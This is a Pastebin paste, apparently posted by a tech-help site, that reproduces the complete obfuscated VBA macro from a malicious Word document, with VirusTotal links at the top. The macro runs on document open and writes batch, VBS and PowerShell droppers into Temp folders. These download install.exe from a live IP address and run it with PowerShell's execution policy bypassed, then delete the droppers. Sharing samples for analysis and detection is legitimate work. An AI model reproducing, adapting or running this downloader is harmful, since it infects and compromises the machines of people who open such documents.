API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 3rd, 2015
295
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.96 KB | None | 0 0
raw download clone embed print report
  1. hi from techhelplist.com
  2.  
  3. macro from malicious .doc:
  4. https://www.virustotal.com/en/file/44175230b4e479dcce1b82c27d762a890626606fb34debb4d1cf939c344e9572/analysis/
  5.  
  6. downloads : 146.185.213.35/upd/install.exe
  7. https://www.virustotal.com/en/file/5cfbc395d95347350e85fafb3d15e811350b18dce1e2abfe981ed59449c5ecdd/analysis/
  8.  
  9. ---------------------------------------------
  10.  
  11. Rem Attribute VBA_ModuleType=VBADocumentModule
  12. Option VBASupport 1
  13. Sub Auto_Open()
  14. h
  15. End Sub
  16. Sub h()
  17. Dim MY_FIWQJOIDJAS, ASIJKDAJKDSJSAKLJKJKSA, AKSJDJLKSJADJKS, ASJKDJLSAL
  18. LKASJDKA = "klasdljasdjklkjsd a jsdakjksjklsdajsadjlks jlkjk asjk"
  19. Dim MY_FILENDIR, ASDASDSA, MY_FILDIR, XPFILEDIR, JAISODJAS
  20. USER = Environ("" & "u" & "s" & "er" & "na" & "me")
  21. ds = 100
  22. jks = ds
  23.  
  24. PST2 = "a" + "dobe" & "acd-u" & "pdate"
  25. VBT2 = "a" + Chr(100) + "o" & "b" & "ea" & "cd-up" & "da" & "te"
  26. VBTXP2 = "a" & Chr(100) & "o" & "be" + "ac" & "d-u" + "pd" + "atex" + "p"
  27. BART2 = "a" + Chr(100) & "o" & "b" & "e" + "ac" & "d-up" + "date"
  28.  
  29. PST1 = PST2 + "." + Chr(Asc("p")) + Chr(ds + 15) + "1"
  30. VBT1 = VBT2 + "." + Chr(118) + "b" + Chr(Asc("s")) + ""
  31. VBTXP = VBTXP2 + "." + Chr(Asc("v")) + Chr(Asc("b")) + "s" + ""
  32. BART = BART2 + Chr(Abs(46)) + Chr(Abs(98)) + Chr(Asc(Chr(Asc("a")))) + Chr(Asc(Chr(ds + 16))) + ""
  33.  
  34. MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
  35. ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
  36. ASDASDSA = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART
  37. MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1
  38. XPFILEDIR = "c:\Windows\Temp\" + VBTXP
  39. TRT = "c:\Windows\Temp\" + BART
  40. KRT = TRT
  41. HYF = KRT
  42.  
  43. On Error Resume Next
  44. SetAttr MY_FILENDIR, vbNormal
  45.  
  46. If (Len(Dir(MY_FILENDIR)) <> 0) Then
  47. Kill MY_FILENDIR
  48. End If
  49.  
  50. On Error Resume Next
  51. SetAttr ASDASDSA, vbNormal
  52. If (Dir(ASDASDSA) <> "") Then
  53. Kill ASDASDSA
  54. End If
  55.  
  56. On Error Resume Next
  57. SetAttr MY_FILDIR, vbNormal
  58. If (Dir(MY_FILDIR) <> "") Then
  59. Kill MY_FILDIR
  60. End If
  61.  
  62. On Error Resume Next
  63. SetAttr XPFILEDIR, vbNormal
  64. If (Dir(XPFILEDIR) <> "") Then
  65. Kill XPFILEDIR
  66. End If
  67.  
  68. Dim FileNumber As Integer
  69. Dim FileNumb As Integer
  70. Dim FileNu As Integer
  71. Dim FileNuG As Integer
  72. Dim FileNukk As Integer
  73. Dim FileNs As Integer
  74. Dim mttt As Integer
  75. Dim retVal As Variant
  76. Dim jskw As Integer
  77. FileNumber = FreeFile
  78. FileNumb = FreeFile
  79. FileNu = FreeFile
  80. FileNukk = FreeFile
  81. FileNs = FreeFile
  82. FileNuG = FreeFile
  83. Dim objWMIService As Variant
  84. Dim colOperatingSystems As Variant
  85. Dim objOperatingSystem As Variant
  86. Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  87. Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  88. For Each objOperatingSystem In colOperatingSystems
  89. SysReport = SysReport & "The operating system on this computer is " & _
  90. objOperatingSystem.Caption & " (" & objOperatingSystem.Version & ")"
  91. Next
  92.  
  93. Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
  94. Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
  95. For Each objOperatingSystem In colOperatingSystems
  96. winverstr = objOperatingSystem.Version
  97. Next
  98.  
  99.  
  100. winver = Val(winverstr)
  101. WaitFor (1)
  102. jskw = winver
  103.  
  104. If (jskw <= 5.5) Then
  105. Open HYF For Output As #FileNuG
  106. Print #FileNuG, "@echo off"
  107. Print #FileNuG, "ping 2.2.1.1 -n" & " 2" + ""
  108. Print #FileNuG, ":ksadatk"
  109. KALJSKAD = "kljsdadajskjdk llsajklasjsaja lSKJKSDK Sklajd askjdlskajd lksaj dklsaj dklsja kld jas"
  110. PIKUIASD = "asldkjskaldj skaj dklsaj klsaj kljklsa dasLsda;as " + "aksjdklsadj slak"
  111. Print #FileNuG, ":kcscriptw"
  112. Print #FileNuG, ":asdsadas"
  113. Print #FileNuG, ":cscripdiqwojd"
  114. Print #FileNuG, "c" & "s" + "c" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34) + ""
  115. Print #FileNuG, "ping 2.2.1.1 -n" & " 2" + ""
  116. KDJFKLSAJKJDSOIIJEDF = "kljsadjkdsajkl jaskksj ksaljd ksaj dlksajd ksajd k" + "asdsaasdsa " & "1io9843ytiurewhf"
  117. PIKUIASD = "asldkjskaldj skaj dklsaj klsaj kljklsa dasLsda;as " + "aksjdklsadj slak"
  118. Print #FileNuG, "" & ":windows"
  119. KALJSKAD = "kljsdadajskjdk llsajklasjsaja lSKJKSDK Sklajd askjdlskajd lksaj dklsaj dklsja kld jas"
  120. PIKUIASD = "asldkjskaldj skaj dklsaj klsaj kljklsa dasLsda;as " + "aksjdklsadj slak"
  121. Print #FileNuG, "c:\W" + "indows\Te" + "mp\444" + "." + Chr(Asc("e")) + "x" + Chr(Asc("e"))
  122. Print #FileNuG, ":loop"
  123. Print #FileNuG, "ping 1.1.2.2 -n" & " 1"
  124. Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
  125. Print #FileNuG, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
  126. Print #FileNuG, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + BART + Chr(34) + " goto loop"
  127. Print #FileNuG, "if " + "exist " + Chr(34) + "c:\W" + "indows\T" + "emp\" + VBTXP + Chr(34) + " goto loop"
  128. Print #FileNuG, "exit"
  129. Close #FileNuG
  130.  
  131. WaitFor (2)
  132. mttt = 88
  133. SJIQWD = ".35/upd/install"
  134.  
  135. Open XPFILEDIR For Output As #FileNumber
  136. Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://146.185.213" + SJIQWD + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
  137. Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)
  138.  
  139. Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2" + "." + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(mttt - 4) + Chr(84) + Chr(80) + Chr(mttt - 54) + ")"
  140. 'Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
  141.  
  142. Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"
  143.  
  144. Print #FileNumber, "objXMLHTTP.send() "
  145. Print #FileNumber, "If objXMLHTTP.Status = 200 Then"
  146.  
  147. Print #FileNumber, "Set objADOStream = C" + "reateO" + "bject(" + Chr(34) + "A" + "D" + "OD" + "B.S" + "tream" + Chr(34) + ") "
  148.  
  149. Print #FileNumber, "objADOStream.Open "
  150. Print #FileNumber, "objADOStream.Type = 1"
  151. Print #FileNumber, "objADOStream.Write objXMLHTTP.Re" + "" + "sp" + "onse" + "Body "
  152. Print #FileNumber, "objADOStream.Position = 0 "
  153. Print #FileNumber, "objADOStream.SaveToFile strTecation "
  154. Print #FileNumber, "objADOStream.Close "
  155. Print #FileNumber, "Set objADOStream = Nothing "
  156. Print #FileNumber, "End if "
  157. Print #FileNumber, "Set objXMLHTTP = Nothing"
  158. Print #FileNumber, "Set objShell " & "=" + " " + Chr(Asc("C")) + "reate" + "O" + "bject(" + Chr(34) + "W" + "S" + "cript." + "S" + "hell" + Chr(34) + ")"
  159. Close #FileNumber
  160.  
  161. WaitFor (1)
  162.  
  163. ASKJD = TRT
  164. retVal = Shell(ASKJD, 0)
  165.  
  166. End If
  167.  
  168.  
  169. If (winver > 5.5) Then
  170. Open MY_FILENDIR For Output As #FileNumber
  171. Print #FileNumber, "$down = " + Chr(Asc("N")) & "ew" & "-" & Chr(79) & "bject " & Chr(Asc(Chr(Asc("S")))) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
  172. Print #FileNumber, "$url = '" + Chr(Asc(Chr(Asc("h")))) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc(Chr(Asc("p")))) + "://146.185.213" + Chr(Asc(".")) + "35/upd/install" & ".e" & "x" + "e';"
  173. Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
  174. Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Saf" & "ari/600.1.25';" + ""
  175. Print #FileNumber, "$d" + "o" & Chr(Asc("w")) + "n" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
  176. Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
  177. Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
  178.  
  179. Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "v" + Chr(39) + Chr(43) + Chr(39) + "bs" + Chr(39) + ";"
  180. Print #FileNumber, "$b" + "a" + "tFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART2; Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "b" + Chr(39) + Chr(43) + Chr(39) + "at" + Chr(39) + ";"
  181. Print #FileNumber, "$p" + "sFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST2 + Chr(39) + Chr(43) + Chr(39) + "." + Chr(39) + Chr(43) + Chr(39) + "p" + Chr(39) + Chr(43) + Chr(39) + "s1" + Chr(39) + ";"
  182.  
  183. Print #FileNumber, "Start-Sleep -s 15;"
  184. PRINTFILENUGSAASJHKDJSAKHDS = "ASKDHJASKDJKAHDSHJKASH HJKAHJSA JK"
  185. PRISAKUDHNTFILENUGSAASJHKDJSAKHDS = "ASKDHJASSJKADHKDJKAHDSHJKASH HJKAHJKASHDJSA JK"
  186. Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e'; "
  187. Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
  188. Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
  189. Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
  190. Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
  191. Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
  192. Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
  193. Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
  194. Close #FileNumber
  195.  
  196. Open MY_FILDIR For Output As #FileNumb
  197. Print #FileNumb, "Dim dff"
  198. Print #FileNumb, "dff = 68"
  199. Print #FileNumb, "c" & "ur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irec" + "tory = left(WSc" & "ript.ScriptFullName," & "(L" + "en(W" + "S" + "cri" + "pt.Sc" + "riptFullName))-(len(W" + "Sc" + "ript.ScriptName)))"
  200. Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & Chr(34) & Chr(34) & "&" & "S" & Chr(34) & Chr("&") & Chr(34) & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
  201. Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST2 + Chr(34) + "&" + Chr(34) + "." + Chr(34) + "&" + Chr(34) + "p" + Chr(34) + "&" + Chr(34) + "s1" + Chr(34)
  202. Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
  203. Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
  204. Close #FileNumb
  205.  
  206. Open ASDASDSA For Output As #FileNs
  207. Print #FileNs, "@echo off"
  208. Print #FileNs, "ping 1.1.2.2 -n" & " 2"
  209. Print #FileNs, "chcp 1251"
  210. Print #FileNs, ":csakclasjdklas"
  211. Print #FileNs, "set Var1=" + Chr(34) + "." + Chr(34)
  212. Print #FileNs, "set Var2=" + Chr(34) + "v" + Chr(34)
  213. Print #FileNs, "set Var3=" + Chr(34) + "bs" + Chr(34)
  214. Print #FileNs, "c" & "sc" & "ri" & "pt" & Chr(46) + Chr(101) & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT2 + Chr(34) + "%Var1%%Var2%%Var3%"
  215. Print #FileNs, "exit"
  216. Close #FileNs
  217.  
  218. SetAttr MY_FILENDIR, vbNormal
  219. SetAttr ASDASDSA, vbNormal
  220. SetAttr MY_FILDIR, vbNormal
  221.  
  222. WaitFor (1)
  223. SJAKLD = ASDASDSA
  224. retVal = Shell(SJAKLD, 0)
  225. End If
  226.  
  227.  
  228. findTest
  229. secondTest
  230. For Each myStoryRange In ActiveDocument.StoryRanges
  231. With myStoryRange.Find
  232. .Text = "<" & "sel" & "ect>"
  233. .Replacement.Text = " "
  234. .Wrap = wdFindContinue
  235. .Execute Replace:=wdReplaceAll
  236. End With
  237. Next myStoryRange
  238.  
  239. For Each myStoryRange In ActiveDocument.StoryRanges
  240. With myStoryRange.Find
  241. .Text = "</s" & "ele" & "ct>"
  242. .Replacement.Text = " "
  243. .Wrap = wdFindContinue
  244. .Execute Replace:=wdReplaceAll
  245. End With
  246. Next myStoryRange
  247.  
  248. For Each myStoryRange In ActiveDocument.StoryRanges
  249. With myStoryRange.Find
  250. .Text = "<" & "in" & "box>"
  251. .Replacement.Text = " "
  252. .Wrap = wdFindContinue
  253. .Execute Replace:=wdReplaceAll
  254. End With
  255. Next myStoryRange
  256.  
  257. For Each myStoryRange In ActiveDocument.StoryRanges
  258. With myStoryRange.Find
  259. .Text = "</" & "in" & "box>"
  260. .Replacement.Text = " "
  261. .Wrap = wdFindContinue
  262. .Execute Replace:=wdReplaceAll
  263. End With
  264. Next myStoryRange
  265.  
  266.  
  267. End Sub
  268. Sub WaitFor(NumOfSeconds As Long)
  269. Dim SngSec As Long
  270. SngSec = Timer + NumOfSeconds
  271.  
  272. Do While Timer < SngSec
  273. DoEvents
  274. Loop
  275.  
  276. End Sub
  277.  
  278. Sub AutoOpen()
  279. Auto_Open
  280. End Sub
  281. Sub Workbook_Open()
  282. Auto_Open
  283. End Sub
  284. Sub findTest()
  285. Dim firstTerm As String
  286. Dim secondTerm As String
  287. Dim rrtt As Range
  288. Dim selRange As Range
  289. Dim selectedText As String
  290.  
  291. Set rrtt = ActiveDocument.Range
  292. firstTerm = "<" + "s" + "e" & "le" + "ct>"
  293. secondTerm = "<" + "/" + "se" + "l" & "ec" + "t>"
  294. ASKASAIEJ = "ask as8d j dnkjh12kh1 sad"
  295. With rrtt.Find
  296. .Text = firstTerm
  297. .MatchWholeWord = True
  298. .Execute
  299. ASKUKKIEJ = "aasdlkasjdask as8d j dnkjh12kh1 sad"
  300. rrtt.Collapse direction:=wdCollapseEnd
  301. Set selRange = ActiveDocument.Range
  302. selRange.Start = rrtt.End
  303. .Text = secondTerm
  304. .MatchWholeWord = True
  305. .Execute
  306. ASKSASADW = "asjldklas"
  307. rrtt.Collapse direction:=wdCollapseStart
  308. selRange.End = rrtt.Start
  309. selectedText = selRange.Delete
  310. End With
  311. End Sub
  312.  
  313. Sub secondTest()
  314. Dim firstTerm As String
  315. Dim secondTerm As String
  316. Dim myRanget As Range
  317. Dim yytt As Range
  318. Dim selRanget As Range
  319. Dim selectedTextt As String
  320.  
  321. Set yytt = ActiveDocument.Range
  322. firstTerm = "<" + "in" & "bo" + "x>"
  323. secondTerm = "</" + "in" & "bo" + "x>"
  324. With yytt.Find
  325. .Text = firstTerm
  326. .MatchWholeWord = True
  327. .Execute
  328. ASKIEJ = "ask as8d j dnkjh12kh1 sad"
  329. yytt.Collapse direction:=wdCollapseEnd
  330.  
  331. Set selRanget = ActiveDocument.Range
  332. selRanget.Start = yytt.End
  333. .Text = secondTerm
  334. .MatchWholeWord = True
  335. .Execute
  336.  
  337. yytt.Collapse direction:=wdCollapseStart
  338. selRanget.End = yytt.Start
  339. selectedTextt = selRanget
  340. selRanget.Font.Color = wdColorBlack
  341. End With
  342. End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!